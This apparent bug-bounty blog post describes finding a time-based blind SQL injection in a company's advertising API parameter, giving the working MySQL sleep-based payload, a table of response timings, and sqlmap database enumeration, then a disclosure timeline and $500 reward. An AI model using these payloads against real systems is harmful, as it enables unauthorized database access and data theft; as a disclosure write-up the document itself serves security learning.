how i found Bug in System Company and get 500$ bounty
Hello Everyone ,
I found SQL INJECTION in advertising system in company
at first i am use Sub-finder Tool to get all subdomain of domain :
i am get sub-domain with login page :
i am try to scan it , so i am user Burpsuite Tool :
when login with username demo & demo the page in java-script the system make GET request to this API endpoint :
https://demo.xxxx.com/api/advertiser/tracking-question?company_uid=p5b4c46b09fb0d2&limit=50&offset=0
i am try to add ‘ or “ { company_uid} parameter
but no things happen so let try SQL injection with Time-based :
i am try this payload : 0"XOR(if(now()=sysdate(),sleep(20),0))XOR”Z
and the server take 20 seconds to return data to me
if you add sleep(12) the response time needs 12 seconds to browse the web page and if you add sleep(20) the browser and the burp response after 20-second show you response and page like this :
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.508
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.543
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.523
- 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.565
- 0"XOR(if(now()=sysdate(),sleep(3),0))XOR”Z => 3.518
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.502
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.491
- 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.508
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.695
I decided to run SQLMAP tool :
after 5 min i am get this info :
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
number of databases : 10
I have decided to stop in order not to break the company’s privacy policy and try to contact with company with there email
and get replay from him :)
19/03/2021: found bug and contact with company
20/03/2021 : fixed the bug
20/03/2021 : recheck and conform the fix
23/03/2021 : revived the bounty {500$}
